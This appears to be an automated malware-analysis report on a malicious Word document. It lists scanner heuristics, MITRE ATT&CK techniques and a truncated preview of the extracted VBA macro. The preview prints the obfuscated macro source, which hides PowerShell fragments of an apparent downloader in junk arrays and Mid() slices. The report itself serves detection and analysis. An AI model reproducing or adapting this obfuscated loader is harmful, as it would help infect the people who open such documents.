Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristics indicate that the macros use the Shell() function to execute arbitrary code. The ClamAV detection 'Doc.Macro.Obfuscation-6389653-0' further confirms its malicious nature. The primary function of the VBA script appears to be downloading and executing a second-stage payload.
Heuristics (7)

- ClamAV: Doc.Macro.Obfuscation-6389653-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Obfuscation-6389653-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 136863 bytes |

SHA-256 (macros.bas): b7dafe0cf3a6146921cc82e946398dd784ba799846375b559c4ebd1f4dcfdfb7

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zKETIifthc"
Function BajsCjKRDYzJH()
OrDbQpvJDf = Array(LTrim(LTrim("TAvQIrfZmZsmh" + "WrEHTUtr")), LTrim(LTrim("bajjnhwYjtV" + "JNbiNblvA")), LTrim(LTrim("WRNzdqjPf" + "cWUpbIsrnBMsMq")), LTrim(LTrim("ddZGsIwd" + "EPWpEIsR")), LTrim(LTrim("bqntlGEjt" + "zFdFWkzM")), LTrim(LTrim("JmlfsLlM" + "CniJuilAZksS")), LTrim(LTrim("JOoiDaJ" + "FEwlHcpKvizuSh")), LTrim(LTrim("dqLzUWL" + "UnIdXrNIK")))
TUFjHs = Mid("lmpWcjBlIc[5]+Ss4xSs4)').rEPLaCe(([cHar]71+[cHar]50+[cHar]83),'|').rEPLaCe(([cJuPcN78w5wZI", 7, 72)
csTwbvDz = Array(LTrim(LTrim("zculLmD" + "hzqUVodTFTA")), LTrim(LTrim("XSJGNARHj" + "PJTfNhdQp")), LTrim(LTrim("qiiuApftzK" + "QkwjhTnYKVw")), LTrim(LTrim("QjhApbwpodcWpn" + "FYVXJWkwY")), LTrim(LTrim("zfOpsfDulN" + "TopSBUrm")), LTrim(LTrim("bqtEhAoz" + "bjlIfqvhzwwZb")), LTrim(LTrim("ZDmjjFH" + "tMPtImK")), LTrim(LTrim("rqFHKhZL" + "zWUUunjz")))
wNWlPQIa = Array(LTrim(LTrim("mzihXmB" + "pdCsYibIKosbpd")), LTrim(LTrim("pczzzSSiaprfkX" + "SYzYjhNcPZBOhZ")), LTrim(LTrim("jNJDtFanC" + "WvbChCrlOVT")), LTrim(LTrim("QzMcAiazDlI" + "GiWhipsk")), LTrim(LTrim("vJmlZiWKdTDwFw" + "rQFrNEZl")), LTrim(LTrim("RwDfKHYcjiVn" + "raADnZSENA")), LTrim(LTrim("KpNkAXqVYzTc" + "rAWubNWaYRZ")), LTrim(LTrim("rKRzTiDvVUU" + "obLsAPaXwVLnDX")))
PcOzfVOBAI = Array(LTrim(LTrim("wsmmVbQFo" + "wNFjjZwsAmAU")), LTrim(LTrim("YOjAimmOudR" + "jQKNmat")), LTrim(LTrim("NdaldVuSNGnNcP" + "YlbiTBXCk")), LTrim(LTrim("jzJniNLHaOvnz" + "MrUBnqEXTC")), LTrim(LTrim("cLsasqaqwzYl" + "isbFCBSkoDV")), LTrim(LTrim("hVPuiIiGACC" + "hhYUzzanG")), LTrim(LTrim("TuOwVRjBoHWzK" + "LwPpuiifqI")), LTrim(LTrim("UdwnodiUtC" + "fkmMXzOuwh")))
WNlqAfna = Mid("348U6+[CHAR]115),[CHAR]39) G'+'2S&( zqAEnV:PUBLiC[13]+zqAEnV:PUlrBqV27Hb6Pv4ld", 5, 59)
slTkb = Array(LTrim(LTrim("AiHmYnFJNYV" + "RQjJWfc")), LTrim(LTrim("zBiaJqC" + "WwdwwECROiv")), LTrim(LTrim("iSwTfLJ" + "RMpHbRiz")), LTrim(LTrim("jchlZmPvZHMNOu" + "kWXjDKuwhuOKI")), LTrim(LTrim("UfaDShFOUJ" + "iYGDwuCRCXE")), LTrim(LTrim("zvplizrKcGZEcm" + "wNhVCNAU")), LTrim(LTrim("ovlALtGwQlcH" + "vbOczDczCaJ")), LTrim(LTrim("GEUBCjwbDziO" + "wjzaorJCTRFHZ")))
nZBqz = Array(LTrim(LTrim("DIBkktcKoD" + "aBokOzi")), LTrim(LTrim("iRSqQfCiGfQvM" + "zZqmEspsjORaJ")), LTrim(LTrim("XnlPQHDFlSkF" + "KViXHsjDPubv")), LTrim(LTrim("wmiDZqVRKTuB" + "FnsnXCzKiWE")), LTrim(LTrim("JhajIsJUfIQWh" + "tjQABkWcnwLbW")), LTrim(LTrim("waUPdNQJuk" + "bkhAwWV")), LTrim(LTrim("fIPudUU" + "jtiVhWjYEo")), LTrim(LTrim("sUckofz" + "zpcrZqVrRjj")))
CUuRjdw = Array(LTrim(LTrim("ridbajRlsfN" + "OJGoMmdjF")), LTrim(LTrim("wuWuOir" + "jNfPLNtBwthwEA")), LTrim(LTrim("qaZdTbfW" + "WmkjEfVmu")), LTrim(LTrim("zzhwwtvKnjBJzw" + "jUpAXTBrNtYd")), LTrim(LTrim("zSXuCGAN" + "cakYQrmQ")), LTrim(LTrim("nlBXLjmW" + "zHUEaPlNUMH")), LTrim(LTrim("szUYsOPz" + "KEzjksI")), LTrim(LTrim("HqIfbDFoXA" + "mDWaIGunjz")))
DRSdPuFY = Mid("5N735VzXjO6RQ8E1hbk5msYun6Sw1saVpbc.ToStriNVs+NVsng(NVs+NVs),'+' NVs+NVsRSV'+'huas);NVs+N'+'VsInvoke-Item(RNVs+NVsSVhuNVs+NVsas);break;}catSs4+Ss4ch{NVs+NVswriteNVs+NVs-host R'+'SVNVs+NVs_.Ex'+'ceptiNVs+NVson.MesNVs+NVsSs4+Ss4dHb", 34, 193)
QrGczsdQEFj = Array(LTrim(LTrim("uJtjPQPUEAJwH" + "clCXaOiuUi")), LTrim(LTrim("CFiLiSr" + "zGiatVYPiV")), LTrim(LTrim("jjjDNjouGSLApP" + "NLkIaiRYKPt")), LTrim(LTrim("JCBwAYWw" + "SBRbqYlEmF")), LTrim(LTrim("LNHNiWvQOHZoTZ" + "rETLbTQHvJT")), LTrim(LTrim("jJjTXJAwvuo" + "ddFjPsNzCK")), LTrim(LTrim("hlaiauGMDLqL" + "ioBiTak")), LTrim(LTrim("PzhwNhrCwWdZdz" + "zfZDpikInRzB")))
pCRtIbluW = Array(LTrim(LTrim("SWXcnDWXp" + "dnNVwaRuPk")), LTrim(LTrim("OuMwnioaqE" + "ZoYmIwQCRzL")), LTrim(LTrim("JPIEJfdtRPwEbK" + "zYhzwSBOZwM")), LTrim(LTrim("SiNSUCvDi" + "aiuMKJKpUKz")), LTrim(LTrim("QdjCMfIBjI" + "MLPEwiBjHvUwDC")), LTrim(LTrim("HrDkbCVzNjiS" + "PuhvShiBvFNLT")), LTrim(LTrim("pZwfjAaYQwz" + "urNCVOLLQMN")), LT
... (truncated)